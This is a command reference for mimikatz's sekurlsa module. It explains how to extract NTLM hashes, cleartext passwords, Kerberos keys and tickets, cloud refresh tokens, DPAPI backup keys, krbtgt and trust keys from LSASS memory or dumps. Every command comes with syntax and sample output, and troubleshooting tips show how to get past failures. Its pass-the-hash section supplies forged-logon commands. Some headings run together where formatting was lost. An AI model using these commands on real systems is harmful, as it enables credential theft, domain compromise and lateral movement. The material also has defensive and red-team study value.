Sekurlsa module command reference
The sekurlsa module gathers credential material from a live LSASS process or an offline minidump by loading provider-specific parsers. Its command table exposes providers such as MSV, WDigest, Kerberos, CloudAP, TSPKG, SSP, DPAPI, and Credential Manager, as well as helper utilities for pass-the-hash, boot key management, and Kerberos ticket extraction.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L8-L154】
Before running provider commands, ensure the module is pointed at the correct data source:
sekurlsa::process reinitializes the module so future commands read live LSASS memory.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L112-L116】sekurlsa::minidump <path> switches to an offline LSASS dump that you can analyze without touching the live process.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L119-L130】Common acquisition failures affect every command. Watch for messages such as LSASS process not found (?), architecture mismatches, or missing SystemInfoStream, and resolve them by running with administrative rights, matching your build/architecture, and supplying a complete minidump.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L156-L220】
Each section below summarizes syntax, use cases, sample output, and troubleshooting guidance.
sekurlsa::processsekurlsa::processmimikatz # sekurlsa::process
Switch to PROCESS
sekurlsa::minidump <path>sekurlsa::minidump C:\path\to\lsass.dmpmimikatz # sekurlsa::minidump C:\temp\lsass.dmp
Switch to MINIDUMP : 'C:\temp\lsass.dmp'
<minidumpfile.dmp> argument is missing appears when no file path is supplied; rerun with a valid path.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L121-L129】Minidump without SystemInfoStream (?) indicates an incomplete dump—re-capture it with the -ma flag in procdump or similar tools.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L188-L207】ProcessorArchitecture ... != ...) require opening the dump with the same architecture build of mimikatz.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L195-L204】sekurlsa::msvsekurlsa::msvmimikatz # sekurlsa::msv
Authentication Id : 0 ; 123456 (00000000:0001E240)
Package Name (NTLM only): NTLM
UserName : CONTOSO\alice
NTLM : 8846f7eaee8fb117ad06bdd830b7586c
SHA1 : 11d6b0758fddba8861c378c2ffb437e6b92245c8
n.e. (KIWI_MSV1_0_CREDENTIALS KO) or kull_m_memory_copy failures imply LSASS memory changed during reading; rerun quickly or capture a minidump for a stable snapshot.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c†L72-L127】sekurlsa::wdigestsekurlsa::wdigestmimikatz # sekurlsa::wdigest
Authentication Id : 0 ; 24680 (00000000:000060A8)
UserName : CONTOSO\bob
Password : Sup3rSecret!
KO, the module could not locate the WDigest session list—ensure the target build still stores credentials (Windows 8.1/2012 R2 and later disable it by default) or use sekurlsa::logonPasswords to confirm availability.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.c†L60-L70】sekurlsa::kerberossekurlsa::kerberosmimikatz # sekurlsa::kerberos
Authentication Id : 0 ; 414141 (00000000:00065151)
UserName : alice
Domain : CONTOSO.COM
Password : (Kerberos keys, PIN, or smartcard data)
kull_m_memory_copy during CSP or credential reads mean LSASS moved objects; retry immediately or fall back to an offline dump to avoid race conditions.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c†L391-L405】sekurlsa::tspkgsekurlsa::tspkgmimikatz # sekurlsa::tspkg
Authentication Id : 0 ; 4011 (00000000:00000FAB)
UserName : CONTOSO\rduser
Password : TS-Delegation-Password
sekurlsa::livesspsekurlsa::livesspmimikatz # sekurlsa::livessp
Authentication Id : 0 ; 98765 (00000000:000181CD)
UserName : CONTOSO\service
Password : (LiveSSP secret)
sekurlsa::logonPasswords to verify sessions.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L13-L31】sekurlsa::cloudapsekurlsa::cloudapmimikatz # sekurlsa::cloudap
Authentication Id : 0 ; 2222 (00000000:000008AE)
UserName : alice@contoso.com
Primary Refresh Token : eyJ0eXAiOiJKV1Qi...
Device Key : {GUID}
KO, the pattern search failed—confirm CloudAP is present on the target build and rerun after an interactive Azure AD login so cache structures exist. When nothing outputs, the account may not have a PRT cached yet.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c†L24-L119】sekurlsa::sspsekurlsa::sspmimikatz # sekurlsa::ssp
Authentication Id : 0 ; 1999 (00000000:000007CF)
Package : CustomSSP
UserName : CONTOSO\svc_account
Password : (decrypted secret)
kull_m_memory_copy fails mid-enumeration, retry quickly or switch to an offline dump to stabilize the structures.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.c†L46-L64】sekurlsa::logonPasswordssekurlsa::logonPasswordsmimikatz # sekurlsa::logonPasswords
Authentication Id : 0 ; 123456
msv : ...
tspkg : ...
wdigest : ...
kerberos : ...
sekurlsa::bootkeyPurpose: Manage the Secure Kernel boot key cache to support isolated credential decryption.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.c†L155-L210】
Syntax:
sekurlsa::bootkey /flushsekurlsa::bootkey /new:<32-byte-hex>sekurlsa::bootkey /raw:C:\dumps\memory.binFlags:
/flush — Clears cached candidate keys and resets the current IumMkPerBoot value, which you should do when a previous attempt populated the cache with stale data.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.c†L155-L161】/new:<hex> — Injects a new 32-byte boot key (hex-encoded) and clears the cache so subsequent decryptions use the supplied value; use this when you already recovered the correct boot key from another source.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.c†L162-L170】/raw:<path> — Scans a raw memory image or dump for additional boot key candidates, automatically appending any finds to the cache; handy when you captured RAM separately and need more key guesses.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.c†L173-L185】Example usage/output:
mimikatz # sekurlsa::bootkey /raw:C:\dumps\ram.bin
> SecureKernel stream found in minidump (32768 bytes)
4 candidate keys found
mimikatz # sekurlsa::bootkey /flush
Potential errors & fixes: No key? indicates the tool could not read or parse key material—verify the raw file path and permissions.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.c†L155-L210】 SkpEncryptionWorker(decrypt) errors mean the candidate key failed; supply a different key or re-run /raw against a higher quality memory capture.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.c†L195-L210】
sekurlsa::pthPurpose: Perform pass-the-hash/key on an existing or new logon session and optionally impersonate the resulting token.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L883-L1005】
Syntax:
sekurlsa::pth /user:<name> /domain:<fqdn> /ntlm:<hash> [/aes128:<hex>] [/aes256:<hex>] [/run:<program>] [/impersonate] [/luid:<value>]
/luid:<value> — Target an existing logon session by LUID; use this when you know the session you want to modify and do not want to spawn a new process.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L894-L961】/user:<name> and /domain:<name> — Required together when you want to create a new net-only logon that will be patched; without them, the command warns about missing arguments.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L901-L915】/run:<program> — Overrides the default program (cmd.exe) that is launched for a new logon, letting you start a specific tool under the forged credentials.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L905-L909】/impersonate — After patching a net-only logon, duplicates the token and impersonates it on the current thread, which is useful for pivoting without launching a new process.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L905-L988】/ntlm:<hash> or /rc4:<hash> — Supplies the 16-byte NTLM hash (RC4 key) to inject; mandatory unless you provide AES keys, because at least one credential material must be replaced.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L946-L1002】/aes128:<hex> — Inserts a 128-bit Kerberos key. Only works on Windows 7/2008 R2 and later where AES session keys are supported; use this when targeting Kerberos authentication that relies on AES keys.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L918-L932】/aes256:<hex> — Inserts a 256-bit Kerberos key. Like /aes128, it is restricted to modern builds (Windows 8.1 / KB2871997 or later) and is necessary when the target service demands AES-256 tickets.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L932-L944】Example usage/output:
mimikatz # sekurlsa::pth /user:alice /domain:CONTOSO /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:powershell.exe
user : alice
domain : CONTOSO
program : powershell.exe
netonly : OK
Potential errors & fixes:
/user or /domain arguments trigger warnings when creating net-only logons—supply both parameters.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L901-L915】kull_m_memory_copy failures during hash injection imply LSASS memory shifted; retry quickly or elevate privileges.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c†L72-L127】/aes128) or KB2871997/Windows 8.1+ (for /aes256); on older builds the helper skips AES injection, so rely on NTLM instead.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L918-L944】sekurlsa::krbtgtsekurlsa::krbtgtmimikatz # sekurlsa::krbtgt
Current Key : aes256_hmac 32 b : c4d3...
Previous Key: rc4_hmac_old 16 b : 8846...
sekurlsa::dpapisystemsekurlsa::dpapisystemmimikatz # sekurlsa::dpapisystem
Machine key : 35d1e4a16a7e8e0c2932...
User key : 128b0f9ad98f8a1a47fe...
sekurlsa::trustsekurlsa::trustmimikatz # sekurlsa::trust
Domain Trust : CONTOSO.COM -> FABRIKAM.COM
Type : Cross-forest
Incoming : aes256_hmac 32 b : a1b2...
Outgoing : rc4_hmac 16 b : c3d4...
sekurlsa::backupkeysAvailability: x64/ARM64 only (same guard as trust).【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L28-L31】
Purpose: Retrieve preferred and legacy DPAPI backup keys used to decrypt DPAPI master keys.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L820-L877】
Syntax:
sekurlsa::backupkeyssekurlsa::backupkeys /export/export — Passes an export flag into the analyzer so that recovered backup keys are written out, which you need when you want .pvk/.der output for later DPAPI master key recovery.【F:mimikatz/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L862-L877】Example usage/output:
mimikatz # sekurlsa::backupkeys /export
DPAPI Backup Keys :
* Preferred : {GUID} (exported to 20240101-120000-preferred.pvk)
* Legacy : {GUID} (exported to 20240101-120000-legacy.pvk)
Potential errors & fixes: If nothing exports, ensure you supplied /export; otherwise, only in-memory details are shown.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L862-L877】 A Pattern not found in DPAPI service error means the DPAPI module offsets were not located—verify the target build is supported and rerun after switching to a matching architecture build.【F:mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c†L796-L837】
sekurlsa::tickets.kirbi files.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c†L360-L465】sekurlsa::ticketssekurlsa::tickets /export/export — Any argument toggles the export flag (the implementation simply checks whether arguments exist), so using /export or similar causes each ticket to be saved to a file. Use it when you plan to replay tickets with other tools or need them for offline analysis.【F:mimikatz/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c†L360-L365】【F:mimikatz/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c†L451-L463】mimikatz # sekurlsa::tickets /export
* PAC : yes
* ServiceName : krbtgt/CONTOSO.COM @ CONTOSO.COM
-> Ticket : 0 ; 0 - 0x00000000 : C:\temp\krbtgt.kirbi
kull_m_file_writeData errors indicate the export directory is unwritable—change to a writable folder or run as administrator.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c†L659-L661】 If tickets do not appear, ensure the account has active Kerberos sessions.sekurlsa::ekeyssekurlsa::ekeysmimikatz # sekurlsa::ekeys
LogonId : 0 ; 999 (00000000:000003E7)
* Key List :
> aes256_hmac (32b) : c1d2...
> rc4_hmac (16b) : e3f4...
kull_m_memory_copy when reading key lists mean LSASS modified memory; retry quickly or switch to a minidump for consistent data.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c†L440-L454】sekurlsa::dpapisekurlsa::dpapimimikatz # sekurlsa::dpapi
Authentication Id : 0 ; 5555 (00000000:000015B3)
MasterKey : {GUID}
Key : 4d9f...
Sha1 : 5e6a...
sekurlsa::credmansekurlsa::credmanmimikatz # sekurlsa::credman
Authentication Id : 0 ; 7777 (00000000:00001E61)
Target : MicrosoftAccount:user=alice@contoso.com
User : alice@contoso.com
Password : P@ssw0rd!
kull_m_memory_copy warnings point to racing LSASS memory; capture a minidump or rerun immediately.【F:mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_credman.c†L44-L89】